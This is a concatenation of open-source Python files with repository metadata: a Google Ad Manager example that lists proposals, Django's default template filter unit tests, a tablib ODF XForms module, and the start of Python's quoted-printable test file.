result = aliases_base_paths
result = [path for path in result if path]
result = list(OrderedSet(result))
return result
| apache-2.0 |
Aloomaio/googleads-python-lib | examples/ad_manager/v201811/proposal_service/get_all_proposals.py | 1 | 1761 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example gets all proposals.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
def main(client):
# Initialize appropriate service.
proposal_service = client.GetService('ProposalService', version='v201811')
# Create a statement to select proposals.
statement = ad_manager.StatementBuilder(version='v201811')
# Retrieve a small amount of proposals at a time, paging
# through until all proposals have been retrieved.
while True:
response = proposal_service.getProposalsByStatement(statement.ToStatement())
if 'results' in response and len(response['results']):
for proposal in response['results']:
# Print out some information for each proposal.
print('Proposal with ID "%d" and name "%s" was found.\n' %
(proposal['id'], proposal['name']))
statement.offset += statement.limit
else:
break
print('\nNumber of results found: %s' % response['totalResultSetSize'])
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
| apache-2.0 |
sodafree/backend | tests/regressiontests/defaultfilters/tests.py | 25 | 29878 | # -*- coding: utf-8 -*-
from __future__ import with_statement
import datetime
import decimal
from django.template.defaultfilters import *
from django.test import TestCase
from django.utils import unittest, translation
class DefaultFiltersTests(TestCase):
def test_floatformat(self):
self.assertEqual(floatformat(7.7), u'7.7')
self.assertEqual(floatformat(7.0), u'7')
self.assertEqual(floatformat(0.7), u'0.7')
self.assertEqual(floatformat(0.07), u'0.1')
self.assertEqual(floatformat(0.007), u'0.0')
self.assertEqual(floatformat(0.0), u'0')
self.assertEqual(floatformat(7.7, 3), u'7.700')
self.assertEqual(floatformat(6.000000, 3), u'6.000')
self.assertEqual(floatformat(6.200000, 3), u'6.200')
self.assertEqual(floatformat(6.200000, -3), u'6.200')
self.assertEqual(floatformat(13.1031, -3), u'13.103')
self.assertEqual(floatformat(11.1197, -2), u'11.12')
self.assertEqual(floatformat(11.0000, -2), u'11')
self.assertEqual(floatformat(11.000001, -2), u'11.00')
self.assertEqual(floatformat(8.2798, 3), u'8.280')
self.assertEqual(floatformat(5555.555, 2), u'5555.56')
self.assertEqual(floatformat(001.3000, 2), u'1.30')
self.assertEqual(floatformat(0.12345, 2), u'0.12')
self.assertEqual(floatformat(decimal.Decimal('555.555'), 2), u'555.56')
self.assertEqual(floatformat(decimal.Decimal('09.000')), u'9')
self.assertEqual(floatformat(u'foo'), u'')
self.assertEqual(floatformat(13.1031, u'bar'), u'13.1031')
self.assertEqual(floatformat(18.125, 2), u'18.13')
self.assertEqual(floatformat(u'foo', u'bar'), u'')
self.assertEqual(floatformat(u'¿Cómo esta usted?'), u'')
self.assertEqual(floatformat(None), u'')
# Check that we're not converting to scientific notation.
self.assertEqual(floatformat(0, 6), u'0.000000')
self.assertEqual(floatformat(0, 7), u'0.0000000')
self.assertEqual(floatformat(0, 10), u'0.0000000000')
self.assertEqual(floatformat(0.000000000000000000015, 20),
u'0.00000000000000000002')
pos_inf = float(1e30000)
self.assertEqual(floatformat(pos_inf), unicode(pos_inf))
neg_inf = float(-1e30000)
self.assertEqual(floatformat(neg_inf), unicode(neg_inf))
nan = pos_inf / pos_inf
self.assertEqual(floatformat(nan), unicode(nan))
class FloatWrapper(object):
def __init__(self, value):
self.value = value
def __float__(self):
return self.value
self.assertEqual(floatformat(FloatWrapper(11.000001), -2), u'11.00')
# Regression for #15789
decimal_ctx = decimal.getcontext()
old_prec, decimal_ctx.prec = decimal_ctx.prec, 2
try:
self.assertEqual(floatformat(1.2345, 2), u'1.23')
self.assertEqual(floatformat(15.2042, -3), u'15.204')
self.assertEqual(floatformat(1.2345, '2'), u'1.23')
self.assertEqual(floatformat(15.2042, '-3'), u'15.204')
self.assertEqual(floatformat(decimal.Decimal('1.2345'), 2), u'1.23')
self.assertEqual(floatformat(decimal.Decimal('15.2042'), -3), u'15.204')
finally:
decimal_ctx.prec = old_prec
# This fails because of Python's float handling. Floats with many zeroes
# after the decimal point should be passed in as another type such as
# unicode or Decimal.
@unittest.expectedFailure
def test_floatformat_fail(self):
self.assertEqual(floatformat(1.00000000000000015, 16), u'1.0000000000000002')
def test_addslashes(self):
self.assertEqual(addslashes(u'"double quotes" and \'single quotes\''),
u'\\"double quotes\\" and \\\'single quotes\\\'')
self.assertEqual(addslashes(ur'\ : backslashes, too'),
u'\\\\ : backslashes, too')
def test_capfirst(self):
self.assertEqual(capfirst(u'hello world'), u'Hello world')
def test_escapejs(self):
self.assertEqual(escapejs_filter(u'"double quotes" and \'single quotes\''),
u'\\u0022double quotes\\u0022 and \\u0027single quotes\\u0027')
self.assertEqual(escapejs_filter(ur'\ : backslashes, too'),
u'\\u005C : backslashes, too')
self.assertEqual(escapejs_filter(u'and lots of whitespace: \r\n\t\v\f\b'),
u'and lots of whitespace: \\u000D\\u000A\\u0009\\u000B\\u000C\\u0008')
self.assertEqual(escapejs_filter(ur'<script>and this</script>'),
u'\\u003Cscript\\u003Eand this\\u003C/script\\u003E')
self.assertEqual(
escapejs_filter(u'paragraph separator:\u2029and line separator:\u2028'),
u'paragraph separator:\\u2029and line separator:\\u2028')
def test_fix_ampersands(self):
self.assertEqual(fix_ampersands_filter(u'Jack & Jill & Jeroboam'),
u'Jack & Jill & Jeroboam')
def test_linenumbers(self):
self.assertEqual(linenumbers(u'line 1\nline 2'),
u'1. line 1\n2. line 2')
self.assertEqual(linenumbers(u'\n'.join([u'x'] * 10)),
u'01. x\n02. x\n03. x\n04. x\n05. x\n06. x\n07. '\
u'x\n08. x\n09. x\n10. x')
def test_lower(self):
self.assertEqual(lower('TEST'), u'test')
# uppercase E umlaut
self.assertEqual(lower(u'\xcb'), u'\xeb')
def test_make_list(self):
self.assertEqual(make_list('abc'), [u'a', u'b', u'c'])
self.assertEqual(make_list(1234), [u'1', u'2', u'3', u'4'])
def test_slugify(self):
self.assertEqual(slugify(' Jack & Jill like numbers 1,2,3 and 4 and'\
' silly characters ?%.$!/'),
u'jack-jill-like-numbers-123-and-4-and-silly-characters')
self.assertEqual(slugify(u"Un \xe9l\xe9phant \xe0 l'or\xe9e du bois"),
u'un-elephant-a-loree-du-bois')
def test_stringformat(self):
self.assertEqual(stringformat(1, u'03d'), u'001')
self.assertEqual(stringformat(1, u'z'), u'')
def test_title(self):
self.assertEqual(title('a nice title, isn\'t it?'),
u"A Nice Title, Isn't It?")
self.assertEqual(title(u'discoth\xe8que'), u'Discoth\xe8que')
def test_truncatewords(self):
self.assertEqual(
truncatewords(u'A sentence with a few words in it', 1), u'A ...')
self.assertEqual(
truncatewords(u'A sentence with a few words in it', 5),
u'A sentence with a few ...')
self.assertEqual(
truncatewords(u'A sentence with a few words in it', 100),
u'A sentence with a few words in it')
self.assertEqual(
truncatewords(u'A sentence with a few words in it',
'not a number'), u'A sentence with a few words in it')
def test_truncatewords_html(self):
self.assertEqual(truncatewords_html(
u'<p>one <a href="#">two - three <br>four</a> five</p>', 0), u'')
self.assertEqual(truncatewords_html(u'<p>one <a href="#">two - '\
u'three <br>four</a> five</p>', 2),
u'<p>one <a href="#">two ...</a></p>')
self.assertEqual(truncatewords_html(
u'<p>one <a href="#">two - three <br>four</a> five</p>', 4),
u'<p>one <a href="#">two - three <br>four ...</a></p>')
self.assertEqual(truncatewords_html(
u'<p>one <a href="#">two - three <br>four</a> five</p>', 5),
u'<p>one <a href="#">two - three <br>four</a> five</p>')
self.assertEqual(truncatewords_html(
u'<p>one <a href="#">two - three <br>four</a> five</p>', 100),
u'<p>one <a href="#">two - three <br>four</a> five</p>')
self.assertEqual(truncatewords_html(
u'\xc5ngstr\xf6m was here', 1), u'\xc5ngstr\xf6m ...')
def test_upper(self):
self.assertEqual(upper(u'Mixed case input'), u'MIXED CASE INPUT')
# lowercase e umlaut
self.assertEqual(upper(u'\xeb'), u'\xcb')
def test_urlencode(self):
self.assertEqual(urlencode(u'fran\xe7ois & jill'),
u'fran%C3%A7ois%20%26%20jill')
self.assertEqual(urlencode(1), u'1')
def test_iriencode(self):
self.assertEqual(iriencode(u'S\xf8r-Tr\xf8ndelag'),
u'S%C3%B8r-Tr%C3%B8ndelag')
self.assertEqual(iriencode(urlencode(u'fran\xe7ois & jill')),
u'fran%C3%A7ois%20%26%20jill')
def test_urlizetrunc(self):
self.assertEqual(urlizetrunc(u'http://short.com/', 20), u'<a href='\
u'"http://short.com/" rel="nofollow">http://short.com/</a>')
self.assertEqual(urlizetrunc(u'http://www.google.co.uk/search?hl=en'\
u'&q=some+long+url&btnG=Search&meta=', 20), u'<a href="http://'\
u'www.google.co.uk/search?hl=en&q=some+long+url&btnG=Search&'\
u'meta=" rel="nofollow">http://www.google...</a>')
self.assertEqual(urlizetrunc('http://www.google.co.uk/search?hl=en'\
u'&q=some+long+url&btnG=Search&meta=', 20), u'<a href="http://'\
u'www.google.co.uk/search?hl=en&q=some+long+url&btnG=Search'\
u'&meta=" rel="nofollow">http://www.google...</a>')
# Check truncating of URIs which are the exact length
uri = 'http://31characteruri.com/test/'
self.assertEqual(len(uri), 31)
self.assertEqual(urlizetrunc(uri, 31),
u'<a href="http://31characteruri.com/test/" rel="nofollow">'\
u'http://31characteruri.com/test/</a>')
self.assertEqual(urlizetrunc(uri, 30),
u'<a href="http://31characteruri.com/test/" rel="nofollow">'\
u'http://31characteruri.com/t...</a>')
self.assertEqual(urlizetrunc(uri, 2),
u'<a href="http://31characteruri.com/test/"'\
u' rel="nofollow">...</a>')
def test_urlize(self):
# Check normal urlize
self.assertEqual(urlize('http://google.com'),
u'<a href="http://google.com" rel="nofollow">http://google.com</a>')
self.assertEqual(urlize('http://google.com/'),
u'<a href="http://google.com/" rel="nofollow">http://google.com/</a>')
self.assertEqual(urlize('www.google.com'),
u'<a href="http://www.google.com" rel="nofollow">www.google.com</a>')
self.assertEqual(urlize('djangoproject.org'),
u'<a href="http://djangoproject.org" rel="nofollow">djangoproject.org</a>')
self.assertEqual(urlize('info@djangoproject.org'),
u'<a href="mailto:info@djangoproject.org">info@djangoproject.org</a>')
# Check urlize with https addresses
self.assertEqual(urlize('https://google.com'),
u'<a href="https://google.com" rel="nofollow">https://google.com</a>')
# Check urlize doesn't overquote already quoted urls - see #9655
self.assertEqual(urlize('http://hi.baidu.com/%D6%D8%D0%C2%BF'),
u'<a href="http://hi.baidu.com/%D6%D8%D0%C2%BF" rel="nofollow">'
u'http://hi.baidu.com/%D6%D8%D0%C2%BF</a>')
self.assertEqual(urlize('www.mystore.com/30%OffCoupons!'),
u'<a href="http://www.mystore.com/30%25OffCoupons!" rel="nofollow">'
u'www.mystore.com/30%OffCoupons!</a>')
self.assertEqual(urlize('http://en.wikipedia.org/wiki/Caf%C3%A9'),
u'<a href="http://en.wikipedia.org/wiki/Caf%C3%A9" rel="nofollow">'
u'http://en.wikipedia.org/wiki/Caf%C3%A9</a>')
self.assertEqual(urlize('http://en.wikipedia.org/wiki/Café'),
u'<a href="http://en.wikipedia.org/wiki/Caf%C3%A9" rel="nofollow">'
u'http://en.wikipedia.org/wiki/Café</a>')
# Check urlize keeps balanced parentheses - see #11911
self.assertEqual(urlize('http://en.wikipedia.org/wiki/Django_(web_framework)'),
u'<a href="http://en.wikipedia.org/wiki/Django_(web_framework)" rel="nofollow">'
u'http://en.wikipedia.org/wiki/Django_(web_framework)</a>')
self.assertEqual(urlize('(see http://en.wikipedia.org/wiki/Django_(web_framework))'),
u'(see <a href="http://en.wikipedia.org/wiki/Django_(web_framework)" rel="nofollow">'
u'http://en.wikipedia.org/wiki/Django_(web_framework)</a>)')
# Check urlize adds nofollow properly - see #12183
self.assertEqual(urlize('foo@bar.com or www.bar.com'),
u'<a href="mailto:foo@bar.com">foo@bar.com</a> or '
u'<a href="http://www.bar.com" rel="nofollow">www.bar.com</a>')
# Check urlize handles IDN correctly - see #13704
self.assertEqual(urlize('http://c✶.ws'),
u'<a href="http://xn--c-lgq.ws" rel="nofollow">http://c✶.ws</a>')
self.assertEqual(urlize('www.c✶.ws'),
u'<a href="http://www.xn--c-lgq.ws" rel="nofollow">www.c✶.ws</a>')
self.assertEqual(urlize('c✶.org'),
u'<a href="http://xn--c-lgq.org" rel="nofollow">c✶.org</a>')
self.assertEqual(urlize('info@c✶.org'),
u'<a href="mailto:info@xn--c-lgq.org">info@c✶.org</a>')
# Check urlize doesn't highlight malformed URIs - see #16395
self.assertEqual(urlize('http:///www.google.com'),
u'http:///www.google.com')
self.assertEqual(urlize('http://.google.com'),
u'http://.google.com')
self.assertEqual(urlize('http://@foo.com'),
u'http://@foo.com')
# Check urlize accepts more TLDs - see #16656
self.assertEqual(urlize('usa.gov'),
u'<a href="http://usa.gov" rel="nofollow">usa.gov</a>')
# Check urlize doesn't crash on invalid email with dot-starting domain - see #17592
self.assertEqual(urlize('email@.stream.ru'),
u'email@.stream.ru')
def test_wordcount(self):
self.assertEqual(wordcount(''), 0)
self.assertEqual(wordcount(u'oneword'), 1)
self.assertEqual(wordcount(u'lots of words'), 3)
self.assertEqual(wordwrap(u'this is a long paragraph of text that '\
u'really needs to be wrapped I\'m afraid', 14),
u"this is a long\nparagraph of\ntext that\nreally needs\nto be "\
u"wrapped\nI'm afraid")
self.assertEqual(wordwrap(u'this is a short paragraph of text.\n '\
u'But this line should be indented', 14),
u'this is a\nshort\nparagraph of\ntext.\n But this\nline '\
u'should be\nindented')
self.assertEqual(wordwrap(u'this is a short paragraph of text.\n '\
u'But this line should be indented',15), u'this is a short\n'\
u'paragraph of\ntext.\n But this line\nshould be\nindented')
def test_rjust(self):
self.assertEqual(ljust(u'test', 10), u'test ')
self.assertEqual(ljust(u'test', 3), u'test')
self.assertEqual(rjust(u'test', 10), u' test')
self.assertEqual(rjust(u'test', 3), u'test')
def test_center(self):
self.assertEqual(center(u'test', 6), u' test ')
def test_cut(self):
self.assertEqual(cut(u'a string to be mangled', 'a'),
u' string to be mngled')
self.assertEqual(cut(u'a string to be mangled', 'ng'),
u'a stri to be maled')
self.assertEqual(cut(u'a string to be mangled', 'strings'),
u'a string to be mangled')
def test_force_escape(self):
self.assertEqual(
force_escape(u'<some html & special characters > here'),
u'<some html & special characters > here')
self.assertEqual(
force_escape(u'<some html & special characters > here ĐÅ€£'),
u'<some html & special characters > here'\
u' \u0110\xc5\u20ac\xa3')
def test_linebreaks(self):
self.assertEqual(linebreaks_filter(u'line 1'), u'<p>line 1</p>')
self.assertEqual(linebreaks_filter(u'line 1\nline 2'),
u'<p>line 1<br />line 2</p>')
self.assertEqual(linebreaks_filter(u'line 1\rline 2'),
u'<p>line 1<br />line 2</p>')
self.assertEqual(linebreaks_filter(u'line 1\r\nline 2'),
u'<p>line 1<br />line 2</p>')
def test_linebreaksbr(self):
self.assertEqual(linebreaksbr(u'line 1\nline 2'),
u'line 1<br />line 2')
self.assertEqual(linebreaksbr(u'line 1\rline 2'),
u'line 1<br />line 2')
self.assertEqual(linebreaksbr(u'line 1\r\nline 2'),
u'line 1<br />line 2')
def test_removetags(self):
self.assertEqual(removetags(u'some <b>html</b> with <script>alert'\
u'("You smell")</script> disallowed <img /> tags', 'script img'),
u'some <b>html</b> with alert("You smell") disallowed tags')
self.assertEqual(striptags(u'some <b>html</b> with <script>alert'\
u'("You smell")</script> disallowed <img /> tags'),
u'some html with alert("You smell") disallowed tags')
def test_dictsort(self):
sorted_dicts = dictsort([{'age': 23, 'name': 'Barbara-Ann'},
{'age': 63, 'name': 'Ra Ra Rasputin'},
{'name': 'Jonny B Goode', 'age': 18}], 'age')
self.assertEqual([sorted(dict.items()) for dict in sorted_dicts],
[[('age', 18), ('name', 'Jonny B Goode')],
[('age', 23), ('name', 'Barbara-Ann')],
[('age', 63), ('name', 'Ra Ra Rasputin')]])
# If it gets passed anything other than a list of dictionaries
# it should fail silently
self.assertEqual(dictsort([1, 2, 3], 'age'), '')
self.assertEqual(dictsort('Hello!', 'age'), '')
self.assertEqual(dictsort({'a': 1}, 'age'), '')
self.assertEqual(dictsort(1, 'age'), '')
def test_dictsortreversed(self):
sorted_dicts = dictsortreversed([{'age': 23, 'name': 'Barbara-Ann'},
{'age': 63, 'name': 'Ra Ra Rasputin'},
{'name': 'Jonny B Goode', 'age': 18}],
'age')
self.assertEqual([sorted(dict.items()) for dict in sorted_dicts],
[[('age', 63), ('name', 'Ra Ra Rasputin')],
[('age', 23), ('name', 'Barbara-Ann')],
[('age', 18), ('name', 'Jonny B Goode')]])
# If it gets passed anything other than a list of dictionaries
# it should fail silently
self.assertEqual(dictsortreversed([1, 2, 3], 'age'), '')
self.assertEqual(dictsortreversed('Hello!', 'age'), '')
self.assertEqual(dictsortreversed({'a': 1}, 'age'), '')
self.assertEqual(dictsortreversed(1, 'age'), '')
def test_first(self):
self.assertEqual(first([0,1,2]), 0)
self.assertEqual(first(u''), u'')
self.assertEqual(first(u'test'), u't')
def test_join(self):
self.assertEqual(join([0,1,2], u'glue'), u'0glue1glue2')
def test_length(self):
self.assertEqual(length(u'1234'), 4)
self.assertEqual(length([1,2,3,4]), 4)
self.assertEqual(length_is([], 0), True)
self.assertEqual(length_is([], 1), False)
self.assertEqual(length_is('a', 1), True)
self.assertEqual(length_is(u'a', 10), False)
def test_slice(self):
self.assertEqual(slice_filter(u'abcdefg', u'0'), u'')
self.assertEqual(slice_filter(u'abcdefg', u'1'), u'a')
self.assertEqual(slice_filter(u'abcdefg', u'-1'), u'abcdef')
self.assertEqual(slice_filter(u'abcdefg', u'1:2'), u'b')
self.assertEqual(slice_filter(u'abcdefg', u'1:3'), u'bc')
self.assertEqual(slice_filter(u'abcdefg', u'0::2'), u'aceg')
def test_unordered_list(self):
self.assertEqual(unordered_list([u'item 1', u'item 2']),
u'\t<li>item 1</li>\n\t<li>item 2</li>')
self.assertEqual(unordered_list([u'item 1', [u'item 1.1']]),
u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t</ul>\n\t</li>')
self.assertEqual(
unordered_list([u'item 1', [u'item 1.1', u'item1.2'], u'item 2']),
u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t\t<li>item1.2'\
u'</li>\n\t</ul>\n\t</li>\n\t<li>item 2</li>')
self.assertEqual(
unordered_list([u'item 1', [u'item 1.1', [u'item 1.1.1',
[u'item 1.1.1.1']]]]),
u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1\n\t\t<ul>\n\t\t\t<li>'\
u'item 1.1.1\n\t\t\t<ul>\n\t\t\t\t<li>item 1.1.1.1</li>\n\t\t\t'\
u'</ul>\n\t\t\t</li>\n\t\t</ul>\n\t\t</li>\n\t</ul>\n\t</li>')
self.assertEqual(unordered_list(
['States', ['Kansas', ['Lawrence', 'Topeka'], 'Illinois']]),
u'\t<li>States\n\t<ul>\n\t\t<li>Kansas\n\t\t<ul>\n\t\t\t<li>'\
u'Lawrence</li>\n\t\t\t<li>Topeka</li>\n\t\t</ul>\n\t\t</li>'\
u'\n\t\t<li>Illinois</li>\n\t</ul>\n\t</li>')
class ULItem(object):
def __init__(self, title):
self.title = title
def __unicode__(self):
return u'ulitem-%s' % str(self.title)
a = ULItem('a')
b = ULItem('b')
self.assertEqual(unordered_list([a,b]),
u'\t<li>ulitem-a</li>\n\t<li>ulitem-b</li>')
# Old format for unordered lists should still work
self.assertEqual(unordered_list([u'item 1', []]), u'\t<li>item 1</li>')
self.assertEqual(unordered_list([u'item 1', [[u'item 1.1', []]]]),
u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t</ul>\n\t</li>')
self.assertEqual(unordered_list([u'item 1', [[u'item 1.1', []],
[u'item 1.2', []]]]), u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1'\
u'</li>\n\t\t<li>item 1.2</li>\n\t</ul>\n\t</li>')
self.assertEqual(unordered_list(['States', [['Kansas', [['Lawrence',
[]], ['Topeka', []]]], ['Illinois', []]]]), u'\t<li>States\n\t'\
u'<ul>\n\t\t<li>Kansas\n\t\t<ul>\n\t\t\t<li>Lawrence</li>'\
u'\n\t\t\t<li>Topeka</li>\n\t\t</ul>\n\t\t</li>\n\t\t<li>'\
u'Illinois</li>\n\t</ul>\n\t</li>')
def test_add(self):
self.assertEqual(add(u'1', u'2'), 3)
def test_get_digit(self):
self.assertEqual(get_digit(123, 1), 3)
self.assertEqual(get_digit(123, 2), 2)
self.assertEqual(get_digit(123, 3), 1)
self.assertEqual(get_digit(123, 4), 0)
self.assertEqual(get_digit(123, 0), 123)
self.assertEqual(get_digit(u'xyz', 0), u'xyz')
def test_date(self):
# real testing of date() is in dateformat.py
self.assertEqual(date(datetime.datetime(2005, 12, 29), u"d F Y"),
u'29 December 2005')
self.assertEqual(date(datetime.datetime(2005, 12, 29), ur'jS \o\f F'),
u'29th of December')
def test_time(self):
# real testing of time() is done in dateformat.py
self.assertEqual(time(datetime.time(13), u"h"), u'01')
self.assertEqual(time(datetime.time(0), u"h"), u'12')
def test_timesince(self):
# real testing is done in timesince.py, where we can provide our own 'now'
self.assertEqual(
timesince_filter(datetime.datetime.now() - datetime.timedelta(1)),
u'1 day')
self.assertEqual(
timesince_filter(datetime.datetime(2005, 12, 29),
datetime.datetime(2005, 12, 30)),
u'1 day')
def test_timeuntil(self):
self.assertEqual(
timeuntil_filter(datetime.datetime.now() + datetime.timedelta(1, 1)),
u'1 day')
self.assertEqual(
timeuntil_filter(datetime.datetime(2005, 12, 30),
datetime.datetime(2005, 12, 29)),
u'1 day')
def test_default(self):
self.assertEqual(default(u"val", u"default"), u'val')
self.assertEqual(default(None, u"default"), u'default')
self.assertEqual(default(u'', u"default"), u'default')
def test_if_none(self):
self.assertEqual(default_if_none(u"val", u"default"), u'val')
self.assertEqual(default_if_none(None, u"default"), u'default')
self.assertEqual(default_if_none(u'', u"default"), u'')
def test_divisibleby(self):
self.assertEqual(divisibleby(4, 2), True)
self.assertEqual(divisibleby(4, 3), False)
def test_yesno(self):
self.assertEqual(yesno(True), u'yes')
self.assertEqual(yesno(False), u'no')
self.assertEqual(yesno(None), u'maybe')
self.assertEqual(yesno(True, u'certainly,get out of town,perhaps'),
u'certainly')
self.assertEqual(yesno(False, u'certainly,get out of town,perhaps'),
u'get out of town')
self.assertEqual(yesno(None, u'certainly,get out of town,perhaps'),
u'perhaps')
self.assertEqual(yesno(None, u'certainly,get out of town'),
u'get out of town')
def test_filesizeformat(self):
self.assertEqual(filesizeformat(1023), u'1023 bytes')
self.assertEqual(filesizeformat(1024), u'1.0 KB')
self.assertEqual(filesizeformat(10*1024), u'10.0 KB')
self.assertEqual(filesizeformat(1024*1024-1), u'1024.0 KB')
self.assertEqual(filesizeformat(1024*1024), u'1.0 MB')
self.assertEqual(filesizeformat(1024*1024*50), u'50.0 MB')
self.assertEqual(filesizeformat(1024*1024*1024-1), u'1024.0 MB')
self.assertEqual(filesizeformat(1024*1024*1024), u'1.0 GB')
self.assertEqual(filesizeformat(1024*1024*1024*1024), u'1.0 TB')
self.assertEqual(filesizeformat(1024*1024*1024*1024*1024), u'1.0 PB')
self.assertEqual(filesizeformat(1024*1024*1024*1024*1024*2000),
u'2000.0 PB')
self.assertEqual(filesizeformat(complex(1,-1)), u'0 bytes')
self.assertEqual(filesizeformat(""), u'0 bytes')
self.assertEqual(filesizeformat(u"\N{GREEK SMALL LETTER ALPHA}"),
u'0 bytes')
def test_localized_filesizeformat(self):
with self.settings(USE_L10N=True):
with translation.override('de', deactivate=True):
self.assertEqual(filesizeformat(1023), u'1023 Bytes')
self.assertEqual(filesizeformat(1024), u'1,0 KB')
self.assertEqual(filesizeformat(10*1024), u'10,0 KB')
self.assertEqual(filesizeformat(1024*1024-1), u'1024,0 KB')
self.assertEqual(filesizeformat(1024*1024), u'1,0 MB')
self.assertEqual(filesizeformat(1024*1024*50), u'50,0 MB')
self.assertEqual(filesizeformat(1024*1024*1024-1), u'1024,0 MB')
self.assertEqual(filesizeformat(1024*1024*1024), u'1,0 GB')
self.assertEqual(filesizeformat(1024*1024*1024*1024), u'1,0 TB')
self.assertEqual(filesizeformat(1024*1024*1024*1024*1024),
u'1,0 PB')
self.assertEqual(filesizeformat(1024*1024*1024*1024*1024*2000),
u'2000,0 PB')
self.assertEqual(filesizeformat(complex(1,-1)), u'0 Bytes')
self.assertEqual(filesizeformat(""), u'0 Bytes')
self.assertEqual(filesizeformat(u"\N{GREEK SMALL LETTER ALPHA}"),
u'0 Bytes')
def test_pluralize(self):
self.assertEqual(pluralize(1), u'')
self.assertEqual(pluralize(0), u's')
self.assertEqual(pluralize(2), u's')
self.assertEqual(pluralize([1]), u'')
self.assertEqual(pluralize([]), u's')
self.assertEqual(pluralize([1,2,3]), u's')
self.assertEqual(pluralize(1,u'es'), u'')
self.assertEqual(pluralize(0,u'es'), u'es')
self.assertEqual(pluralize(2,u'es'), u'es')
self.assertEqual(pluralize(1,u'y,ies'), u'y')
self.assertEqual(pluralize(0,u'y,ies'), u'ies')
self.assertEqual(pluralize(2,u'y,ies'), u'ies')
self.assertEqual(pluralize(0,u'y,ies,error'), u'')
def test_phone2numeric(self):
self.assertEqual(phone2numeric_filter(u'0800 flowers'), u'0800 3569377')
def test_non_string_input(self):
# Filters shouldn't break if passed non-strings
self.assertEqual(addslashes(123), u'123')
self.assertEqual(linenumbers(123), u'1. 123')
self.assertEqual(lower(123), u'123')
self.assertEqual(make_list(123), [u'1', u'2', u'3'])
self.assertEqual(slugify(123), u'123')
self.assertEqual(title(123), u'123')
self.assertEqual(truncatewords(123, 2), u'123')
self.assertEqual(upper(123), u'123')
self.assertEqual(urlencode(123), u'123')
self.assertEqual(urlize(123), u'123')
self.assertEqual(urlizetrunc(123, 1), u'123')
self.assertEqual(wordcount(123), 1)
self.assertEqual(wordwrap(123, 2), u'123')
self.assertEqual(ljust('123', 4), u'123 ')
self.assertEqual(rjust('123', 4), u' 123')
self.assertEqual(center('123', 5), u' 123 ')
self.assertEqual(center('123', 6), u' 123 ')
self.assertEqual(cut(123, '2'), u'13')
self.assertEqual(escape(123), u'123')
self.assertEqual(linebreaks_filter(123), u'<p>123</p>')
self.assertEqual(linebreaksbr(123), u'123')
self.assertEqual(removetags(123, 'a'), u'123')
self.assertEqual(striptags(123), u'123')
| bsd-3-clause |
durden/tablib | tablib/packages/odf/xforms.py | 96 | 1231 | # -*- coding: utf-8 -*-
# Copyright (C) 2006-2007 Søren Roug, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
from namespaces import XFORMSNS
from element import Element
# ODF 1.0 section 11.2
# XForms is designed to be embedded in another XML format.
# Autogenerated
def Model(**args):
return Element(qname = (XFORMSNS,'model'), **args)
def Instance(**args):
return Element(qname = (XFORMSNS,'instance'), **args)
def Bind(**args):
return Element(qname = (XFORMSNS,'bind'), **args)
| mit |
rversteegen/commandergenius | project/jni/python/src/Lib/test/test_quopri.py | 58 | 7365 | from test import test_support
import unittest
import sys, cStringIO, subprocess
import quopri
ENCSAMPLE = """\
Here's a bunch of special=20
=A1=A2=A3=A4=A5=A6=A7=A8=A9
=AA=AB=AC=AD=AE=AF=B0=B1=B2=B3
=B4=B5=B6=B7=B8=B9=BA=BB=BC=BD=BE
=BF=C0=C1=C2=C3=C4=C5=C6
=C7=C8=C9=CA=CB=CC=CD=CE=CF
=D0=D1=D2=D3=D4=D5=D6=D7
=D8=D9=DA=DB=DC=DD=DE=DF
=E0=E1=E2=E3=E4=E5=E6=E7
=E8=E9=EA=EB=EC=ED=EE=EF
=F0=F1=F2=F3=F4=F5=F6=F7
=F8=F9=FA=FB=FC=FD=FE=FF
characters... have fun!
"""
# First line ends with a space
DECSAMPLE = "Here's a bunch of special \n" + \
"""\
\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9
\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3
\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe
\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6
\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf
\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7
\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf
\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7
\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7
\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
characters... have fun!
"""
def withpythonimplementation(testfunc):
def newtest(self):
# Test default implementation
testfunc(self)
# Test Python implementation
if quopri.b2a_qp is not None or quopri.a2b_qp is not None:
oldencode = quopri.b2a_qp
olddecode = quopri.a2b_qp
try:
quopri.b2a_qp = None
quopri.a2b_qp = None
testfunc(self)
finally:
quopri.b2a_qp = oldencode
quopri.a2b_qp = olddecode
newtest.__name__ = testfunc.__name__
return newtest
